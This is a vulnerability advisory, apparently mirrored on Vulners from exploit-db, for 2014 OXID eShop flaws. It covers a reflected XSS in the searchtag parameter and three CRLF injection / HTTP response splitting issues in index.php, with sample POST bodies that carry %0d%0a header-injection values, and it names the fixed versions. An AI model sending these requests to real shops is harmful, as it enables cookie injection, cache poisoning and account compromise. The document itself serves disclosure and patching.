Vulners
Lucene search
OXID eShop XSS / CRLF Injection
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities | 21 Mar 201400:00 | – | zdt |
 | CVE-2014-2016 | 25 Mar 201418:21 | – | attackerkb |
| CVE-2014-2017 | 18 Jan 201814:29 | – | attackerkb |
 | CVE-2014-2016 | 25 Mar 201414:00 | – | cve |
| CVE-2014-2017 | 18 Jan 201814:00 | – | cve |
 | CVE-2014-2016 | 25 Mar 201414:00 | – | cvelist |
| CVE-2014-2017 | 18 Jan 201814:00 | – | cvelist |
 | OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities | 20 Mar 201400:00 | – | exploitdb |
 | EUVD-2014-2068 | 7 Oct 202500:30 | – | euvd |
| EUVD-2014-2069 | 7 Oct 202500:30 | – | euvd |
10
`# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: [email protected]
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that
theoretically can be used to gain unauthorized access to a user account or collect
sensitive information of this user.
SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001
###########################################################################################################
###########################################################################################################
###########################################################################################################
# Multiple CRLF injection / HTTP response splitting #######################################################
Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to
enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability
that theoretically can be used to poison cache, gain unauthorized access to a user account or collect
sensitive information of this user.
A possible exploit by passing such a mal-formed URI could lead to:
- return of a blank page or a PHP error (depending on one's server configuration)
- set unsolicited browser cookies
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002
Vulnerability details:
###########################################################################################################
# 1 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: anid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: cnid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: listtype
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners.
A thanks to the developers who have responded relatively quickly.
Cheers!
//sToRm
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.02188